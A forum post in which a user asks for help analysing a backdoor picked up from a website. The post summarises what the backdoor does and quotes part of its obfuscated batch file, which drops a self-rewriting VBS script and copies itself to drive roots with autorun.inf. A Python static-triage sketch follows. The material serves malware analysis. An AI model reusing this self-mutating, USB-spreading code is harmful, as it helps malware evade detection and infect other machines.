Anyways it looks like a backdoor, and it left an obfuscated batch file in a temp directory. It does a whole bunch of policy changes, changing folder permissions, adding a user in the background, opens the firewall, shuts down Windows Defender and a whole bunch of AV. I haven't had time to look at the executables but I am curious after seeing the batch file. Also a few AVs report this as a tool which grabs your SteamID.
The site's name in question is hxxp://quypt.proboards.com
Also I am kinda stumped on this little snippet of the batch file it left behind. Don't run.
ECHO randomize>>ovfsbeksodog.vbs
ECHO set gpkqtmrducqqqa=createobject("scripting.filesystemobject")>>ovfsbeksodog.vbs
ECHO set mpmnebrcflqhmsflapjfkq=gpkqtmrducqqqa.opentextfile(%0,1)>>ovfsbeksodog.vbs
ECHO eiqihufrjbfanaresgjh=mpmnebrcflqhmsflapjfkq.readall>>ovfsbeksodog.vbs
ECHO qdclllivmghlvehi="ksgphdvileffsjsu knfggeiqihufrjbfanaresgjhslgeovovfsbeksodogosedme vfolkghiqdnbjg ighkrktvitdm vddghactakajbtrl apaupfutdkopvlicbhtg pgsdkllfenlp ingnldakomrotskginhh eleavvtealtjkbvdjsquduepkucqmkoo rggcrjmlfdfdoippie semipvdqepmddjocscdj tokdknsmuuablhplam mbfpubkutohgaptqhtfchd oobpnukbunmtkgakhfjefh opqtmokeiqihufrjbfanaresgjhgoq dmolkjatnrpjbbfbkckqvk rnledlakfnsapd hjfameqfcedr uekaeearsascab ahnjksmkvlvusultjkbvdjsquduepk vcradmmovjbokonvemph ppidlbhjjekoglet nchvsrinjocpropdtmak tluqaclqmuukdgrecd nrniurtairbe frucopeltdpstkfvjdcoll ulmkistquadtsm rtofbomvsmmbnlevofmk qaoqvugtrbhqfptbsk bjemmbacgfqf ilmojrstthqpap qeurmtfgcehboismofpp qiltjkbvdjsquduepkaqcbnmid eiqihufrjbfanaresgjh qdclllivmghlvehi aslennthoeej ltjkbvdjsquduepk ckietoflidgbbg rhduriekhocshmqb gpkqtmrducqqqa mpmnebrcflqhmsflapjfkq ovfsbeksodog":aslennthoeej=split(qdclllivmghlvehi," ")>>ovfsbeksodog.vbs
ECHO for each ltjkbvdjsquduepk in aslennthoeej>>ovfsbeksodog.vbs
ECHO for ckietoflidgbbg=1 to int(rnd*6)+6>>ovfsbeksodog.vbs
ECHO rhduriekhocshmqb=rhduriekhocshmqb+chr((int(rnd*22)+97))+chr(int(rnd*22)+97)>>ovfsbeksodog.vbs
ECHO next>>ovfsbeksodog.vbs
ECHO eiqihufrjbfanaresgjh=replace(eiqihufrjbfanaresgjh,ltjkbvdjsquduepk,rhduriekhocshmqb):rhduriekhocshmqb="">>ovfsbeksodog.vbs
ECHO next>>ovfsbeksodog.vbs
ECHO set mpmnebrcflqhmsflapjfkq=gpkqtmrducqqqa.opentextfile(%0,2,1)>>ovfsbeksodog.vbs
ECHO mpmnebrcflqhmsflapjfkq.writeline eiqihufrjbfanaresgjh>>ovfsbeksodog.vbs
ECHO mpmnebrcflqhmsflapjfkq.close>>ovfsbeksodog.vbs
start ovfsbeksodog.vbs
for p in (b e f g h i j k l m n o p q r s t u v w x y z) do if exist p:%0 goto Non
for i In (b e f g h i j k l m n o p q r s t u v w x y z) do type %0 > i:
ECHO [autorun] > i:\autorun.inf
Any ideas? Did I miss a set command somewhere? The batch is included in the zip file.
http://www.mediafire...al Emulator.zip
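
Added example, not part of the original post: a static triage sketch in Python that rebuilds the dropped .vbs from the `ECHO ...>>file` lines without executing anything, extracts the word list the script replaces with random letters when it rewrites `%0`, and flags the self-rewrite and autorun.inf behaviour visible in the snippet. The sample input is constructed (shortened identifiers, `drop.vbs`) and the function names are hypothetical.

```python
import re

# Constructed sample: a shortened stand-in for the lines quoted in the post.
SAMPLE = r'''ECHO randomize>>drop.vbs
ECHO set fso=createobject("scripting.filesystemobject")>>drop.vbs
ECHO set fh=fso.opentextfile(%0,1)>>drop.vbs
ECHO body=fh.readall>>drop.vbs
ECHO words="fso fh body words drop":arr=split(words," ")>>drop.vbs
ECHO body=replace(body,w,r):r="">>drop.vbs
ECHO set fh=fso.opentextfile(%0,2,1)>>drop.vbs
start drop.vbs
for i In (e f g) do type %0 > i:
ECHO [autorun] > i:\autorun.inf
'''

# "ECHO <text>>><file>" appends <text> to <file>; capture both parts.
ECHO_RE = re.compile(r'^\s*echo\s+(.*?)\s*>>\s*(\S+)\s*$', re.I)

# Behaviours readable straight from the batch text (patterns are assumptions
# tuned to this snippet, not a general detection rule set).
INDICATORS = {
    "self_read": r'opentextfile\(%0,1\)',        # script reads the batch itself
    "self_rewrite": r'opentextfile\(%0,2',       # ...and writes it back
    "copy_to_drive_roots": r'type\s+%0\s*>',     # batch copied to drive letters
    "autorun_write": r'autorun\.inf',
}

def rebuild_dropped(batch_text):
    """Return {filename: script text} rebuilt from ECHO append lines."""
    files = {}
    for line in batch_text.splitlines():
        m = ECHO_RE.match(line)
        if m:
            files.setdefault(m.group(2).lower(), []).append(m.group(1))
    return {name: "\n".join(lines) for name, lines in files.items()}

def rename_list(script):
    """Tokens swapped for random letters: the string passed to split(x," ")."""
    m = re.search(r'(\w+)="([^"]*)":\w+=split\(\1," "\)', script, re.I)
    return m.group(2).split() if m else []

def triage(batch_text):
    """Sorted names of the indicators present in the batch text."""
    return sorted(n for n, p in INDICATORS.items() if re.search(p, batch_text, re.I))

if __name__ == "__main__":
    for name, script in rebuild_dropped(SAMPLE).items():
        print(name, "renames:", rename_list(script))
    print("indicators:", triage(SAMPLE))
```

Run against the quoted snippet, the rename list contains the VBS variable names and the dropped file's own name, which is why the identifiers look random: each run rewrites the batch with fresh names, so file hashes and string signatures will differ between copies.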












